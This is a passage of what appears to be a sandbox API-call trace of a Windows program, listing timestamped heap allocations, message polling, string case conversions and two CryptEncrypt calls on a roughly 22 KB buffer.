(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0212.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0212.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0212.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.037] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0212.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854110 [0212.038] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.038] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0212.038] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0212.038] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854110 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0212.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.039] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.040] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0212.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a95808 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.043] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.044] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x575e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x5760) returned 1 [0212.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.044] CharLowerBuffW (in: lpsz="byte[22368]", cchLength=0xb | out: lpsz="byte[22368]") returned 0xb [0212.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.044] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.045] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.045] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.045] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.045] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab1a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.045] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a95808*, pdwDataLen=0x8cef60*=0x575e, dwBufLen=0x5760 | out: pbData=0x2a95808*, pdwDataLen=0x8cef60*=0x5760) returned 1 [0212.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.046] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.046] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.046] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.046] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.046] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.046] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.047] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.047] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.047] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.047] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.047] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 